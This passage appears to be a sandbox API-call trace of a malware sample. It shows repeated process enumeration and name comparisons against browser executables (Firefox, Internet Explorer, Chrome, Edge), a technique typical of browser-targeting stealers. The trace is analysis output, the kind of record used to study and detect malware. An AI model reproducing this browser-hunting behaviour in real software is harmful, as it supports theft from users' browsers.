hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0205.802] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0205.802] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0205.802] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0205.802] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.802] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.802] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0205.802] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0205.802] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0205.802] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.802] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0205.803] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0205.803] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0205.803] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0205.803] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.803] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.803] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0205.803] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0205.803] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0205.803] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.803] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0205.804] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0205.804] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0205.804] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0205.804] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.804] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0205.805] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0205.805] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0205.805] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0205.805] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.805] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0205.805] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0205.805] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0205.805] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0205.805] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.805] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0205.806] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0205.806] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0205.806] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0205.806] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.806] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0205.806] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0205.806] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0205.806] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0205.806] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.806] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0205.807] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0205.807] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0205.807] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0205.807] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.807] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0205.808] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0205.808] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0205.808] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0205.808] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.808] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0205.808] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0205.808] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0205.808] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0205.808] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0205.808] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0205.809] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0205.809] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0205.809] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0205.809] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.809] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0205.809] CloseHandle (hObject=0xd4) returned 1 [0205.809] Sleep (dwMilliseconds=0x3e8) [0206.898] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0206.900] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.901] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0206.901] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0206.901] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0206.901] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0206.901] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0206.901] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0206.901] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0206.901] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0206.901] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0206.901] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0206.902] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0206.902] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0206.902] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0206.902] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.902] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0206.903] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0206.903] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0206.903] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0206.903] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.903] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0206.903] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0206.903] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0206.903] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0206.903] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.903] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0206.904] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0206.904] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0206.904] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0206.904] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.904] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0206.904] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0206.904] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0206.904] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0206.904] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.904] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0206.905] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0206.905] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0206.905] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0206.905] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.905] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0206.905] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0206.905] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0206.906] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0206.906] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.906] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0206.906] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0206.906] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0206.906] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0206.906] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.906] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.907] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0206.907] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0206.907] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0206.907] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.907] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.907] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0206.907] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0206.907] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0206.907] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.907] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.908] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0206.908] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0206.908] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0206.908] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.908] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.908] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0206.908] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0206.908] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0206.908] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.908] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.909] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0206.909] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0206.909] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0206.909] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.909] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0206.910] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0206.910] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0206.910] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0206.910] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.910] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.910] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0206.910] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0206.910] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0206.910] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.910] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.911] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0206.911] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0206.911] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0206.911] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.911] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0206.911] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0206.911] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0206.911] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0206.911] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.911] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0206.912] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0206.912] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0206.912] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0206.912] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.912] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0206.912] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0206.912] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0206.912] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0206.913] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.913] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.913] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0206.913] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0206.913] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0206.913] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.913] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0206.914] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0206.914] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0206.914] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0206.914] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.914] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0206.914] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0206.914] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0206.914] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0206.914] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.914] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0206.915] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0206.915] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0206.915] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0206.915] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.915] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0206.915] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0206.915] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0206.915] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0206.915] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.915] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0206.916] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0206.916] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0206.916] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0206.916] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.916] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, 